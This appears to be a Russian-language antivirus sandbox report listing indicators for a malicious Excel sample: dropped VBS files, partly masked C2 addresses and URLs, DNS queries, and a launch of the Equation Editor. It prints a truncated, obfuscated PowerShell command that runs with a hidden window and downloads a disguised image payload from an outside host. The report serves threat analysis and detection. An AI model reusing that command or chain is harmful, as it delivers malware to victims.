Техническая информация
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\createdfollowerswithflowing.vBS"
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- %APPDATA%\createdfollowerswithflowing.vbs
- <Текущая директория>\72671000
- <PATH_SAMPLE>.xls
- 'ho#.fyi':80
- '10#.#86.67.211':80
- '91.##.254.14':80
- 'up#####eimagens.com.br':443
- http://ho#.fyi/uW4Kj
- http://10#.#86.67.211/22011/erf/unn.unn.unnunn.doc
- http://10#.#86.67.211/22011/createdfollowerswithflowers.gif
- http://91.##.254.14/Users_API/syscore/file_4445ouzl.x5n.txt
- 'up#####eimagens.com.br':443
- DNS ASK ho#.fyi
- DNS ASK up#####eimagens.com.br
- '%ProgramFiles%\microsoft office\office14\winword.exe' -Embedding
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -Command "(('JPAlink = QYNhttps:'+'//uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235QYN; JPAwebClient = New-Object System.Net.WebCli'+'ent; t'+'ry { JPAdownloadedDat... (со скрытым окном)